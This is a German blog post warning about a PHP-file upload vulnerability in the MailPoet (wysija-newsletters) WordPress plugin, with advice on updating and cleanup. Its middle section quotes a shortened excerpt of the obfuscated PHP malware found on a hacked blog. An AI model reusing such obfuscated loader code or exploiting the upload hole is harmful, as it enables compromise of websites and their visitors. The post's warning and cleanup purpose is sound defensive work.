wp-plugin-mailpoetDies ist zwar keine top aktuelle News mehr, trotzdem wurde ich gestern mehrmals darauf angesprochen. Darum veröffentliche ich hier doch noch so eine Warnung.

Wer das beliebte Newsletter Plugin MailPoet benützt muss jetzt kurz aufpassen. Und zwar wurden viele Server gehackt, wo ein Blog mit diesem Plugin lief. Ausgenützt wurde da eine Sicherheitslücke. Und zwar gab es ein kleinen Programmierfehler in einem Uploadscript, dadurch konnten alle User PHP-Files hochladen.

Der deutsche Hoster 1&1 hat bereits reagiert und erkennt diese Angriffe automatisch und informiert die entsprechenden Kunden.

Anfällig sind alle Versionen von MailPoet Plugin (wysija-newsletters) vor Version 2.6.7. Auch in der Nachfolgeversion gab es noch ein Lücke; aktuell ist nun 2.6.9. Wer eine ältere Version in Betrieb hat, sollte diese unverzüglich aktualisieren oder das Plugin entfernen.

Ob das eigene System von diesem Hack betroffen ist, ist sehr schwer fest zu stellen. Leider muss ich sagen, dass Anfänger da keine Chance haben werden. Denn man muss direkt selbst im Code rumwühlen. Einen ersten Anhaltspunkt kann eine Suche nach PHP-Funktionen mit _replace, _decode oder eval im Namen sein. Das könnten Files sein, die vielleicht verdächt sind.

Der Schadecode von MailPoet

Tim Ehling von Ehtio.de scheint von diesem Plugin-Problem betroffen gewesen zu sein. Er hat auf seinem Blog einen Auszug des Schadecode veröffentlicht. Ein Teil des Codes könnt ihr hier sehen (Danke Tim):

$uuraxnlpjm = ‚SVUFS,6<*msv%x5c%x78257-MSV,6<*)uj7825j:^!#]y81]273]y76]258]y6g]273]y76]271]y7164%50%x22%134%x78%62%x35%165%x!%x5c%x7827!hmg%x5c%x7825)!gj!~
//
//
//Code wurde gekürzt!
//
//
if (!function_exists(‚kxepmslubm‘)) { function kxepmslubm($cetjchcehz, $jybqhcsnqj) { $qvvsahxpkr = NULL; for($vvpizdtrbz=0;$vvpizdtrbz<(sizeof($cetjchcehz)/2);$vvpizdtrbz++) { $qvvsahxpkr .= substr($jybqhcsnqj, $cetjchcehz[($vvpizdtrbz*2)],$cetjchcehz[($vvpizdtrbz*2)+1]); } return $qvvsahxpkr; };} $deakeusrds="x2057x2a40x78150x6e142x621 $uuraxnlpjm=$sybsbytqzq-1; ?>

Was muss ich tun, wenn mein Plugin MailPoet betroffen ist

Ich würde den gesammten Blog löschen und mit eurem Backups neu installieren. Ihr müsst zuerst einfach schauen, ob diese Version noch OK ist oder auch schon gehackt…

Fazit:

Hier sieht man mal wieder, wie wichtig regelmässiges Updaten aller Systeme ist. Da knapp 30% aller Internetwebseiten heute auf WordPress basieren, werden Sicherheitslücken gerne von bösen Menschen ausgenützt…

Über

Eric-Oliver Mächler

Seit 2005 bin ich ein aktiver Blogger. Ich kenne die Kniffe und die Tricks um einen Blog erfolgreich zu machen. Hier gebe ich diese kleinen Tricks gerne weiter und freue mich, wenn ich euch helfen kann. Hier erfährt man mehr über mich.

1 Kommentar

Hinterlass einen Kommentar